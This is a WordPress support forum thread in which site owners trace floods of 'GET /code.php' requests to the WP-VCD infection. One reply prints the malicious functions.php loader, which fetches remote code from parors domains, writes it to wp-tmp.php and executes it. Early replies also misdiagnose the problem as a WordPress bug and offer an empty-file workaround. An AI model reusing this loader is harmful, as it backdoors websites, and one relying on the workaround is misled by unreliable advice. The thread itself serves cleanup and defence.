Support » Fixing WordPress » get /code.php http/1.0

  • nicawordpress

    (@nicawordpress)


    There are thousands of these requests…also, some POST requests:

    sudo tail -f /var/log/apache2/access.log
    127.0.0.1 – – [06/Nov/2019:21:02:31 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:31 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:36 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:37 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:34 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:36 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”

    Can anyone help me track down the source of these connections? I ran several rootkit scanners on the server and didn’t find anything. I’ve been combing through the web directory looking for anything strange but haven’t found anything yet. Googling for code.php is useless

    We faced a similar issue the day before yesterday. After checking the log, it turns that WordPress is trying to get /code.php file under root directory, where there isn’t any. It will generate many database connections and consume many system resources. A quick word around is to create an empty file named code.php under the website root directory. Make sure webapp is the owner of this file.
    I guess it is a bug of wordpress.

Viewing 15 replies - 1 through 15 (of 15 total)
  • petrjirous

    (@petrjirous)

    Actually I have the same issue since 2 days ago. Couldn’t find solution yet.

    petrjirous

    (@petrjirous)

    Another strange thing is it keeps creating connections to database (at least 100 connections). Which is really strange because apache returns 404 on code.php file

    andreapia

    (@andreapia)

    I have the same issue since yesterday. I tried to put a blank code.php in the root but it didn’t work. I also tried to return a 404 error from Nginx. Do you have any suggestions?

    autotutorial

    (@autotutorial)

    127.0.0.1 means localhost, your webserver or an external ip attack. Do you use Apache with some module for load balancing or reverse proxy? If I have not used it it should be REMOTE_ADDRESS in the APACHE log.
    Example mod_rpfa,mod_cloudflare, mod_remoteip etc.

    envitro

    (@envitro)

    I have literally the exact same thing happening. My server started crashing a few days ago and I’ve been trying to trace back to a root cause and came across this:

    Seemingly this happens every 5-10 seconds.

    127.0.0.1 – – [07/Nov/2019:17:53:55 +0000] “GET /code.php HTTP/1.0” 301 – “-” “-”
    127.0.0.1 – – [07/Nov/2019:17:59:01 +0000] “GET /code.php HTTP/1.0” 301 – “-” “-”
    127.0.0.1 – – [07/Nov/2019:17:55:18 +0000] “GET /code.php HTTP/1.0” 301 – “-” “-”
    127.0.0.1 – – [07/Nov/2019:18:02:47 +0000] “GET /code.php HTTP/1.0” 301 – “-” “-“

    • This reply was modified 1 month ago by envitro.
    prashant2211

    (@prashant2211)

    We are also facing same issue.
    Our website is hosted on Google cloud bitnami wordpress

    lowcarbsrezeptede

    (@lowcarbsrezeptede)

    WordPress seems to be looking for code.php file and ends up creating lot of database connections if not found. After suggestions from awesome Bitnami support engineers, I created an empty file in the wordpress root directory and restarted the server. Website is back now.

    petrjirous

    (@petrjirous)

    I confirm that creating empty code.php file helps.

    envitro

    (@envitro)

    Yeah, for some stupid reason that actually worked, although it seems like something ripe for exploit…

    mattwiner

    (@mattwiner)

    We got the SAME exact thing just about 2 days ago too. It was sucking up 8gb of ram, creating over 1000 httpd connections and hundreds of mysql connections.

    Took 2 days to figure it out. Any idea where it came from? Some plugin?

    We too created and empty code.php file and it stopped.

    • This reply was modified 1 month ago by mattwiner.
    cmgboy

    (@cmgboy)

    Guys… i have de solution…
    You need to revome a block code in themes\your_theme\functions.php

    This code (or something similar) its making problems on wordpress..

    Note: Sorry, my english its terrible.

    $wp_auth_key=’12335f8c45ff73be536601a7562a3220′;
    if (($tmpcontent = @file_get_contents(“http://www.parors.com/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“http://www.parors.com/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

    if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
    @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
    if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
    @file_put_contents(‘wp-tmp.php’, $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents(“http://www.parors.pw/code.php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

    if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
    @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
    if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
    @file_put_contents(‘wp-tmp.php’, $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents(“http://www.parors.top/code.php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

    if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
    @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
    if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
    @file_put_contents(‘wp-tmp.php’, $tmpcontent);
    }
    }

    }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    }

    envitro

    (@envitro)

    So it appears to be a WP-VCD malware attack. Can someone else confirm?

    mattwiner

    (@mattwiner)

    @envitro

    Yes this WP-VCD attack. I’m struggling with it right now. Removed php files, clean up functions.php, but these request are still running. Any luck?

    @mattwiner

    I created empty code.php, and still running :(. Still googling and try anything.

Viewing 15 replies - 1 through 15 (of 15 total)
  • You must be logged in to reply to this topic.